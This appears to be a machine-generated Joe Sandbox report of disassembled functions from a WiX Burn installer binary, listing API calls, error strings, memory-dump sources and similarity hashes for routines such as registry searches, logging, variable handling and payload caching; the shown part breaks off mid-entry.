GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,007CB9F7,00000008,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB10E
GetLastError.KERNEL32(?,007CB9F7,00000008,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB11A
_memcmp.LIBVCRUNTIME ref: 007CB1C2

Strings

burn, xrefs: 007CB1E9
Bundle guid didn't match the guid in the PE Header in memory., xrefs: 007CB299
Failed to read section info, data to short: %u, xrefs: 007CB212
Failed to find Burn section., xrefs: 007CB230
.wix, xrefs: 007CB1E1
Failed to read section info, unsupported version: %08x, xrefs: 007CB25C
section.cpp, xrefs: 007CB13E, 007CB16F, 007CB19A, 007CB203, 007CB224, 007CB24D, 007CB28D
Failed to find valid NT image header in buffer., xrefs: 007CB1A6
Failed to find valid DOS image header in buffer., xrefs: 007CB17B
Failed to get module handle to process., xrefs: 007CB148
.wixburn, xrefs: 007CB1BC

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorHandleLastModule_memcmp
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 3888311042-926796631
Opcode ID: e5deefc647e7dd06aa6c04a2dd7e20381dcf9bfdb997e5a475bf4a5926180efe
Instruction ID: dd79ce9cba47818d01cbe2c4e9b1ffd4a0a5cedc447543fbcbff40e26f4caa5e
Opcode Fuzzy Hash: e5deefc647e7dd06aa6c04a2dd7e20381dcf9bfdb997e5a475bf4a5926180efe
Instruction Fuzzy Hash: 02412672384710A7D7715655DC87F2B2355FB40B20F15842DF9129BAC2DB7DC90283A6

Function 007D39FD Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 128COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 007D3A51
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 007D3A5B
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 007D3AC4
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 007D3ACB

Strings

Failed to get length of temp folder., xrefs: 007D3AB5
%u\, xrefs: 007D3AE5
Failed to format session id as a string., xrefs: 007D3AF9
Failed to get length of session id string., xrefs: 007D3B1D
Failed to copy temp folder., xrefs: 007D3B7A
crypt32.dll, xrefs: 007D3A10
Failed to get temp folder., xrefs: 007D3A89
logging.cpp, xrefs: 007D3A7F
4#v, xrefs: 007D3A51

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Process$CurrentErrorLastPathSessionTemp
String ID: 4#v$%u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 1726527325-4287186919
Opcode ID: d5a4dd2866d97049e3398a43db0e8906e818b76e5c34eeb672e2a8fdc49fcb0a
Instruction ID: fa2424ebaed69068875225767a7acaca17b9ab89a2df73f799a52bec2cdf8c41
Opcode Fuzzy Hash: d5a4dd2866d97049e3398a43db0e8906e818b76e5c34eeb672e2a8fdc49fcb0a
Instruction Fuzzy Hash: B24172B298123DABDB209B649C49FDAB7B8EF14710F1001A6F918F7241D6789F818BD1

Function 007D2DDC Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 303COMMON

Download Yara Rule

Strings

Failed to create dictionary from ancestors array., xrefs: 007D2E46
feclient.dll, xrefs: 007D30BB
Failed to copy self to related bundle ancestors., xrefs: 007D312E
plan.cpp, xrefs: 007D311D
crypt32.dll, xrefs: 007D2E0E
%ls;%ls, xrefs: 007D2EDE
Failed to create string array from ancestors., xrefs: 007D2E1A
Unexpected relation type encountered during plan: %d, xrefs: 007D30FE
Failed to add the package provider key "%ls" to the planned list., xrefs: 007D3107
UX aborted plan related bundle., xrefs: 007D3127
Failed to copy ancestors and self to related bundle ancestors., xrefs: 007D2EF6
Failed to lookup the bundle ID in the ancestors dictionary., xrefs: 007D30F0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: %ls;%ls$Failed to add the package provider key "%ls" to the planned list.$Failed to copy ancestors and self to related bundle ancestors.$Failed to copy self to related bundle ancestors.$Failed to create dictionary from ancestors array.$Failed to create string array from ancestors.$Failed to lookup the bundle ID in the ancestors dictionary.$UX aborted plan related bundle.$Unexpected relation type encountered during plan: %d$crypt32.dll$feclient.dll$plan.cpp
API String ID: 0-794096528
Opcode ID: 033386f3352342e9627d00a4f51f9d3dd8bf7cdcefaca7ee9c4df27f2ec6a14d
Instruction ID: 2c0f31f9990b8ad2955594a50cbd4466ebe77faa8768251ba5b847763bcfe502
Opcode Fuzzy Hash: 033386f3352342e9627d00a4f51f9d3dd8bf7cdcefaca7ee9c4df27f2ec6a14d
Instruction Fuzzy Hash: 06B10631900616EFCB15DF64CC41EAAB7B6FF14310F14456BE810AB351D739AEA2CBA2

Function 007CA17D Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007CA1A8
_MREFOpen@16.MSPDB140-MSVCRT ref: 007CA204
RegQueryValueExW.ADVAPI32(000002C0,00000000,00000000,000002C0,00000000,00000000,000002C0,?,00000000,00000000,?,00000000,00000101,000002C0,000002C0,?), ref: 007CA226
RegCloseKey.ADVAPI32(00000000,00000000,00000000,000002C0,00000100,00000000,000002C0), ref: 007CA300

Strings

search.cpp, xrefs: 007CA25B
Failed to format value string., xrefs: 007CA20F
Registry key not found. Key = '%ls', xrefs: 007CA291
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 007CA275
Failed to set variable., xrefs: 007CA2B8
Failed to open registry key. Key = '%ls', xrefs: 007CA2C2
Failed to query registry key value., xrefs: 007CA265
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA2D8
Failed to format key string., xrefs: 007CA1B3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: d61fef9a43c1b4c988690294341c7afc22b45529a0b8ebb3644d32302043af68
Instruction ID: 266ad3f62c07edf30bd1e2b07d380fcca8235b3d983b42cb51eeb5a1d8df1b7d
Opcode Fuzzy Hash: d61fef9a43c1b4c988690294341c7afc22b45529a0b8ebb3644d32302043af68
Instruction Fuzzy Hash: C3411472E4022CBBDF216EA4CC06FAEBB69FB40711F14416DFD14E52D1D77A8E109A92

Function 007C67E5 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 131libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 007C6835
GetLastError.KERNEL32 ref: 007C683F
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 007C6882
GetLastError.KERNEL32 ref: 007C688C
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 007C699D

Strings

Failed to get OS info., xrefs: 007C68DD
Failed to locate RtlGetVersion., xrefs: 007C68BA
Failed to set variant value., xrefs: 007C6981
RtlGetVersion, xrefs: 007C6877
Failed to locate NTDLL., xrefs: 007C686D
ntdll, xrefs: 007C682F
variable.cpp, xrefs: 007C6863, 007C68B0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: c341cefc5f8c1656547e04f1f8a27bbff5101ae2c104dffa4e8509859537a66c
Instruction ID: 4ad49f20876a1b29f8a6e28e5b9978d3137ec02e93e5d88c4328ae99c78d15b7
Opcode Fuzzy Hash: c341cefc5f8c1656547e04f1f8a27bbff5101ae2c104dffa4e8509859537a66c
Instruction Fuzzy Hash: 764193719013389BDB719B65CC49BEABBF4FB08750F00019DF948F6290D7789E54CA95

Function 007C47E9 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 128memorysynchronizationCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,007C535E,?,?,?,?), ref: 007C481A
GetLastError.KERNEL32(?,?,?,007C535E,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007C482B
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C4968
CloseHandle.KERNEL32(?,?,?,?,007C535E,?,?,?,?,?,?,?,?,?,?,?), ref: 007C4971

Strings

Failed to set elevated pipe into thread local storage for logging., xrefs: 007C48A2
comres.dll, xrefs: 007C48D7
user.cpp, xrefs: 007C484F, 007C4898
Failed to allocate thread local storage for logging., xrefs: 007C4859
Failed to create the message window., xrefs: 007C48C6
Failed to pump messages from parent process., xrefs: 007C493C
Failed to connect to unelevated process., xrefs: 007C4810

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$user.cpp
API String ID: 687263955-1790235126
Opcode ID: da9a12ae10ac2c48c900fc0dc59a04c7f369d2f7c871e897d39a5e308f1314d9
Instruction ID: bd0e89de90c94785142023bd4fcf3cf165cde6f64f2ab7f312f0cd7048e0207b
Opcode Fuzzy Hash: da9a12ae10ac2c48c900fc0dc59a04c7f369d2f7c871e897d39a5e308f1314d9
Instruction Fuzzy Hash: 57417472A00615BBDB519BA5CC49FDBB7ACFF04710F00022EFA15E2291DB78A95097E1

Function 007C7E7C Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 214COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000), ref: 007C7E99
LeaveCriticalSection.KERNEL32(?,?,?), ref: 007C80C1

Strings

feclient.dll, xrefs: 007C7F74, 007C7FCA, 007C800B
Failed to write literal flag., xrefs: 007C809A
Failed to write variable value type., xrefs: 007C80A1
Unsupported variable type., xrefs: 007C807E
Failed to write variable value as string., xrefs: 007C8085
Failed to write variable value as number., xrefs: 007C806B
Failed to write variable name., xrefs: 007C80A8
Failed to write variable count., xrefs: 007C7EB4
Failed to get string., xrefs: 007C808C
Failed to get numeric., xrefs: 007C8093
Failed to write included flag., xrefs: 007C80AF
Failed to get version., xrefs: 007C8072

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: 72eb3acfffc2da9a83405ca132c12250f97baa0152687722ee09eb65ff883e30
Instruction ID: a6d7c0e4d5b23bc6010dc9c308e8bb95c3dcef1872f7f3adc5f9a88f6506dd4d
Opcode Fuzzy Hash: 72eb3acfffc2da9a83405ca132c12250f97baa0152687722ee09eb65ff883e30
Instruction Fuzzy Hash: F161A432900619EBCBA29E64CD44FAEBB65FF04354F10416DFA1067290CF78DD95DBA2

Function 007D95AC Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,007DA63D,?,00000000,?,?,007EB049), ref: 007D95C7
GetLastError.KERNEL32(?,007DA63D,?,00000000,?,?,007EB049,?,00000000,?,00000000,?,?,007EB049,?), ref: 007D95D7
CloseHandle.KERNEL32(?,007EB049,00000001,00000003,000007D0,?,?,007EB049,?), ref: 007D96E4

Strings

%ls payload from working path '%ls' to path '%ls', xrefs: 007D968F
Moving, xrefs: 007D9686, 007D968E
Copying, xrefs: 007D9679
Failed to move %ls to %ls, xrefs: 007D96BC
Failed to verify payload signature: %ls, xrefs: 007D9632
Failed to open payload in working path: %ls, xrefs: 007D9606
Failed to copy %ls to %ls, xrefs: 007D96D2
cache.cpp, xrefs: 007D95FB
Failed to verify payload hash: %ls, xrefs: 007D966F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 2528220319-1604654059
Opcode ID: f2e0734e9a0b1df589f8744763a9baf754962db79c2c90326c5b0b2559eef1ee
Instruction ID: 87edcc89e14f408def53ad37dc6503344ec0eac0c7a6113defb1c92712d6e76f
Opcode Fuzzy Hash: f2e0734e9a0b1df589f8744763a9baf754962db79c2c90326c5b0b2559eef1ee
Instruction Fuzzy Hash: F131D471A806247BE7222A258C0AFAB397CEF41B60F01411EFE15FB381D669DD5096E6

Function 007E1341 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0080B468,=S|,00000000,?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000,?), ref: 007E135E
GetLastError.KERNEL32(?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000,?,007C5381,FFF9E89D,007C5381), ref: 007E1368
WaitForSingleObject.KERNEL32(0080B478,000000FF,?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000,?,007C5381), ref: 007E13A2
GetLastError.KERNEL32(?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000,?,007C5381,FFF9E89D,007C5381), ref: 007E13AC
CloseHandle.KERNEL32(00000000,007C5381,=S|,00000000,?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000), ref: 007E13F7
CloseHandle.KERNEL32(00000000,007C5381,=S|,00000000,?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000), ref: 007E1406
CloseHandle.KERNEL32(00000000,007C5381,=S|,00000000,?,007CC06D,=S|,007C52B5,00000000,?,007D763B,?,007C5565,007C5371,007C5371,00000000), ref: 007E1415

Strings

Failed to wait for thread to terminate., xrefs: 007E13DA
cabextract.cpp, xrefs: 007E138C, 007E13D0
Failed to set begin operation event., xrefs: 007E1396
=S|, xrefs: 007E1348
=S|, xrefs: 007E1345

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: =S|$=S|$Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-18881022
Opcode ID: a7fb9ea81ea0189c5963adc83a994cea4b36c91de9badb44d293f26e5a53f434
Instruction ID: 30ecdaa9a7342967183e1300e639977cec67d2c2e5e5c48de1321c1e66df4c25
Opcode Fuzzy Hash: a7fb9ea81ea0189c5963adc83a994cea4b36c91de9badb44d293f26e5a53f434
Instruction Fuzzy Hash: 7521E532201740DFE7315B27CC4ABA772F5FF88712F01462DE59A919E0D778D481DA25

Function 007D3E47 Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 007D3955: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,007D3E61,feclient.dll,?,00000000,?,?,?,007C4A0C), ref: 007D39F1

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,007C4A0C,?,?,0080B478,?,00000001,00000000,00000000), ref: 007D3EF8

Strings

msasn1.dll, xrefs: 007D400E, 007D404F
Failed to copy full log path to prefix., xrefs: 007D405B
Failed to copy log extension to extension., xrefs: 007D403D
feclient.dll, xrefs: 007D3E5B, 007D3F08
crypt32.dll, xrefs: 007D3E9E, 007D3F03, 007D3F0B, 007D3F72, 007D3FAC, 007D3FED, 007D400C, 007D404A, 007D4074
Failed to copy log path to prefix., xrefs: 007D401A
log, xrefs: 007D3E9F
clbcatq.dll, xrefs: 007D4031
Failed to open log: %ls, xrefs: 007D3F74
Failed to get non-session specific TEMP folder., xrefs: 007D3FA2
Failed to get current directory., xrefs: 007D3EDA
Setup, xrefs: 007D3EA5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: 7962ea8f4dd37017245242893356d117e7bcbfe90531e4b8e6c9722ddf32197e
Instruction ID: 7a8ffb0245f383334b399fbb774c5230c003f01f994e163f40a2b62e256c3a39
Opcode Fuzzy Hash: 7962ea8f4dd37017245242893356d117e7bcbfe90531e4b8e6c9722ddf32197e
Instruction Fuzzy Hash: 1361A271A00619BBDB119F24CC46F6A7BB8FF05350F08426AF805DB391E779EE909792

Function 007C6C5D Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 167COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,007C533D,00000000,00000001), ref: 007C6C6E

Part of subcall function 007C55B6: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,007C648B,007C648B,?,007C554A,?,?,00000000), ref: 007C55F2
Part of subcall function 007C55B6: GetLastError.KERNEL32(?,007C554A,?,?,00000000,?,00000000,007C648B,?,007C7DDC,?,?,?,?,?), ref: 007C5621

LeaveCriticalSection.KERNEL32(00000001,?,00000001), ref: 007C6E02

Strings

Failed to set value of variable: %ls, xrefs: 007C6DEA
Failed to insert variable '%ls'., xrefs: 007C6CB3
Attempt to set built-in variable value: %ls, xrefs: 007C6CFC
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 007C6E14
Unsetting variable '%ls', xrefs: 007C6DBE
Setting hidden variable '%ls', xrefs: 007C6D2C
Setting numeric variable '%ls' to value %lld, xrefs: 007C6DA3
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 007C6D79
variable.cpp, xrefs: 007C6CF1
Setting string variable '%ls' to value '%ls', xrefs: 007C6D96
Failed to find variable value '%ls'., xrefs: 007C6C89

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: de5b4126fc2546c595d9c61836571dd5c1c2c7b676531f6ddd7228e4cbcd834b
Instruction ID: 9b2603400aab679efe73c9f9877c9b7a72ca9263c285f364c16d98445b4adffe
Opcode Fuzzy Hash: de5b4126fc2546c595d9c61836571dd5c1c2c7b676531f6ddd7228e4cbcd834b
Instruction Fuzzy Hash: A6510371B00224ABDB309F58CDCAF6B3BA9FBA5710F14011DF8569A2C1D279ED51CAE1

Function 007D2A60 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 007D2ACD

Strings

Failed to add dependents ignored from command-line., xrefs: 007D2B82
crypt32.dll, xrefs: 007D2B18, 007D2C16, 007D2D0B, 007D2D80
Failed to add self-dependent to ignore dependents., xrefs: 007D2B51
Failed to create the string dictionary., xrefs: 007D2B06
Failed to allocate registration action., xrefs: 007D2B36
Failed to check for remaining dependents during planning., xrefs: 007D2C73
wininet.dll, xrefs: 007D2D1E
Failed to add dependent bundle provider key to ignore dependents., xrefs: 007D2C37
Failed to add registration action for self dependent., xrefs: 007D2D9E
Failed to add registration action for dependent related bundle., xrefs: 007D2DD5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: 3ac5da4a9ebcd6d6794646f689ce84c3935864ad11f5716b78397813eed81097
Instruction ID: 8c961c04e11e0001aec67cfe292b75de168f063c48527c1ccfead9a280980ac3
Opcode Fuzzy Hash: 3ac5da4a9ebcd6d6794646f689ce84c3935864ad11f5716b78397813eed81097
Instruction Fuzzy Hash: AEB19D70A00616EFCB659F54C841BAA7BB6FF64310F00816AF8149A352D778DDA3DBE1

Function 007C49DF Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 007C4B5E
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007C4B6F

Strings

Failed to check global conditions, xrefs: 007C4A43
Failed to open log., xrefs: 007C4A12
Failed to create the message window., xrefs: 007C4A92
Failed while running , xrefs: 007C4B24
Failed to set registration variables., xrefs: 007C4AD8
Failed to set layout directory variable to value provided from command-line., xrefs: 007C4B00
Failed to set action variables., xrefs: 007C4ABE
Failed to query registration., xrefs: 007C4AA8
WixBundleLayoutDirectory, xrefs: 007C4AEF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
